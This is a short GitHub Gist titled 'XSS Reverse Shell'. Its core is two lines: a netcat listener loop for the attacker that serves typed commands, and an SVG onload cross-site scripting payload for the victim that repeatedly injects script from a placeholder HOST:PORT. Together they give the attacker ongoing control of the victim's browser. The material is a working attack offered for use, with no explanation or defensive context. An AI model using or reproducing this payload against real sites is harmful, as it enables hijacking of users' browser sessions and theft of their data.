Created
February 28, 2017 20:36
-
-
Save ivanvza/08d75112ee41dec3e92d0ff59505c678 to your computer and use it in GitHub Desktop.
XSS Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment